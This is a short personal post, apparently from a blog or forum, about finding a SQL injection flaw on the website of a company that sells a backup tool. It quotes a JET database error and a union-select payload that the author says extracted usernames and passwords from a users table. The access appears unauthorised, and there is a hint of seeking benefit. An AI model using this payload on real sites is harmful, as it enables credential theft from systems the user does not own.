I'm not very fond of mssql.. it's to dangerous.. forgetting one cast or escape and you're screwed. People can simple drop your database table by table.
Anyway the fun part is that this company is telling people that there's nothing more save than their backup tool.. That might be true.. however considering their website I very much doubt it. Thank god they didn't develop their website on their own.
In two days we'll be contacting them about this security issue. We might benefit from this mistake! ;)
Oh the injection was a simple one:
Microsoft JET Database Engine error '80040e14'
The number of columns in the two selected tables or queries of a union query do not match.
,1,1,1,1 etc etc and eventually:
-1 union all select 1,2,3,4,password,username,7,8,9,10,11,12,13,14,15,16,17 from tblUsers #
gave me everthing I needed to know for a solid Proof of concept ;)
Cheers.
